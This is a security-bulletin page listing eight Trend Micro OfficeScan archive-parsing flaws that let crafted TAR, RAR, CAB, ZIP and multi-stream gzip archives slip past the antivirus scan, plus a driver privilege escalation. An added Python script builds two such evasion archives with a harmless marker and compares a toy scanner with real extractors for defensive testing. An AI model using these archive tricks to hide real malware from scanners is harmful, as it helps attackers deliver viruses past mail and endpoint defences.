The Vigil@nce team watches public vulnerabilities impacting your computers, and then offers security solutions, a database and tools to fix them.

Computer vulnerabilities of TrendMicro OfficeScan XG

computer vulnerability alert CVE-2012-1425 CVE-2012-1443 CVE-2012-1448

TrendMicro antivirus: bypassing via CAB, RAR, TAR, ZIP

Synthesis of the vulnerability

An attacker can create an archive containing a virus, which is not detected by TrendMicro antivirus.
Impacted products: OfficeScan, ScanMail.
Severity: 1/4.
Consequences: data flow.
Provenance: document.
Number of vulnerabilities in this bulletin: 8.
Creation date: 21/03/2012.
Identifiers: BID-52580, BID-52603, BID-52608, BID-52610, BID-52612, BID-52621, BID-52623, BID-52626, CVE-2012-1425, CVE-2012-1443, CVE-2012-1448, CVE-2012-1453, CVE-2012-1456, CVE-2012-1457, CVE-2012-1459, CVE-2012-1461, VIGILANCE-VUL-11476.

Description of the vulnerability

Archive extraction tools accept slightly malformed archives and extract their contents anyway. TrendMicro antivirus, however, parses the same archives more strictly (or differently) and does not detect the viruses they contain.

A TAR archive whose first 4 bytes are "\50\4B\03\04" (the ZIP local file header signature "PK\x03\x04") bypasses the detection. [severity:1/4; BID-52580, CVE-2012-1425]

A RAR archive whose first 2 bytes are "MZ" (the DOS/PE executable signature) bypasses the detection. [severity:1/4; BID-52612, CVE-2012-1443]

A CAB archive whose CFHEADER "cbCabinet" field (declared total size of the cabinet file) holds a large value bypasses the detection. [severity:1/4; BID-52603, CVE-2012-1448]

A CAB archive whose CFHEADER "coffFiles" field (offset of the first CFFILE entry) holds a large value bypasses the detection. [severity:1/4; BID-52621, CVE-2012-1453]

A ZIP archive that starts with TAR data bypasses the detection. [severity:1/4; BID-52608, CVE-2012-1456]

A TAR archive with a large size bypasses the detection. [severity:1/4; BID-52610, CVE-2012-1457]

A TAR archive with a header containing a large value bypasses the detection. [severity:1/4; BID-52623, CVE-2012-1459]

A TAR+GZ archive made of two concatenated gzip streams (members) bypasses the detection. [severity:1/4; BID-52626, CVE-2012-1461]

An attacker can therefore create an archive containing a virus which is not detected by the antivirus while it is still an archive, but which extraction tools unpack without complaint. The virus is detected once it has been extracted on the victim's computer, so only the scanning of the archive itself (for instance in transit, on ScanMail) is defeated.
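The following Python script is an added example, not code from the bulletin or from Trend Micro. It builds two of the eight archives described above, a ZIP preceded by TAR data and a TAR+GZ made of two concatenated gzip members, and contrasts a toy scanner with the standard-library extractors. The scanner is an assumed model of the behaviour the bulletin describes (it picks a parser from the leading magic bytes and inflates only the first gzip member), not Trend Micro's actual logic; the "virus" is a constructed marker string; file names and the `naive_scan`/`extract` helpers are hypothetical.

```python
import gzip
import io
import tarfile
import zipfile
import zlib

# Constructed stand-in for the virus: a harmless marker a scanner would look for.
MARKER = b"SCANNER-TEST-MARKER"


def build_tar(members):
    """Build an uncompressed ustar archive in memory from {name: bytes}."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tf:
        for name, data in members.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def build_zip(members):
    """Build a ZIP archive in memory from {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def zip_with_tar_prefix():
    """Variant 'ZIP archive starting with TAR data': a complete decoy TAR
    (with its end-of-archive blocks) followed by the real ZIP."""
    decoy = build_tar({"readme.txt": b"nothing to see"})
    return decoy + build_zip({"payload.bin": MARKER})


def tgz_with_two_streams():
    """Variant 'TAR+GZ archive with two streams': one TAR split across two
    concatenated gzip members. The split falls right after the first member's
    512-byte header and 512-byte data block, so the first gzip stream alone
    looks like a complete, benign TAR."""
    tar = build_tar({"readme.txt": b"benign", "payload.bin": MARKER})
    first, second = tar[:1024], tar[1024:]
    return gzip.compress(first, mtime=0) + gzip.compress(second, mtime=0)


def sniff(blob):
    """Pick a format from magic bytes alone, as a naive scanner would."""
    if blob[:2] == b"\x1f\x8b":
        return "gzip"
    if blob[:4] == b"PK\x03\x04":
        return "zip"
    if blob[257:262] == b"ustar":
        return "tar"
    return "unknown"


def naive_scan(blob):
    """Toy model (an assumption, not Trend Micro's code) of a scanner that
    trusts the leading magic and inflates only the first gzip member.
    Returns {member name: content} for everything it manages to see."""
    kind = sniff(blob)
    if kind == "gzip":
        d = zlib.decompressobj(16 + zlib.MAX_WBITS)
        blob = d.decompress(blob)  # stops at the first member's end; d.unused_data is ignored
        kind = sniff(blob)
    if kind == "tar":
        with tarfile.open(fileobj=io.BytesIO(blob), mode="r:") as tf:
            return {m.name: tf.extractfile(m).read() for m in tf if m.isfile()}
    if kind == "zip":
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            return {n: zf.read(n) for n in zf.namelist()}
    return {}


def extract(blob):
    """What an extraction tool does: ZIP readers locate the central directory
    from the end of the file and tolerate leading junk; gzip readers inflate
    every concatenated member. Returns {member name: content}."""
    if zipfile.is_zipfile(io.BytesIO(blob)):
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            return {n: zf.read(n) for n in zf.namelist()}
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:*") as tf:
        return {m.name: tf.extractfile(m).read() for m in tf if m.isfile()}


def contains_marker(members):
    """True if any member's content carries the marker."""
    return any(MARKER in data for data in members.values())


if __name__ == "__main__":
    for label, blob in (("zip-after-tar", zip_with_tar_prefix()),
                        ("two-member-tgz", tgz_with_two_streams())):
        seen, got = naive_scan(blob), extract(blob)
        print(f"{label}: scanner saw {sorted(seen)} (marker: {contains_marker(seen)}), "
              f"extractor got {sorted(got)} (marker: {contains_marker(got)})")
```

Both samples are the same parser differential: the scanner and the extractor disagree about where the archive's content is. The check a practitioner wants is exactly this harness: feed the same bytes to the scanner in use and to the unpacker the endpoint will actually run, and compare the member lists.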

vulnerability 10150

Trend Micro OfficeScan: privileges elevation via TMTDI

Synthesis of the vulnerability

A local attacker can use a vulnerability of the TMTDI driver of Trend Micro OfficeScan, in order to gain system privileges.
Impacted products: OfficeScan.
Severity: 2/4.
Consequences: administrator access/rights.
Provenance: user shell.
Creation date: 24/11/2010.
Identifiers: BID-45034, VIGILANCE-VUL-10150.

Description of the vulnerability

The tmtdi.sys (Trend Micro TDI, Transport Driver Interface) kernel driver is installed by the OfficeScan product.

This driver contains a vulnerability which a local attacker can exploit in order to gain SYSTEM privileges.
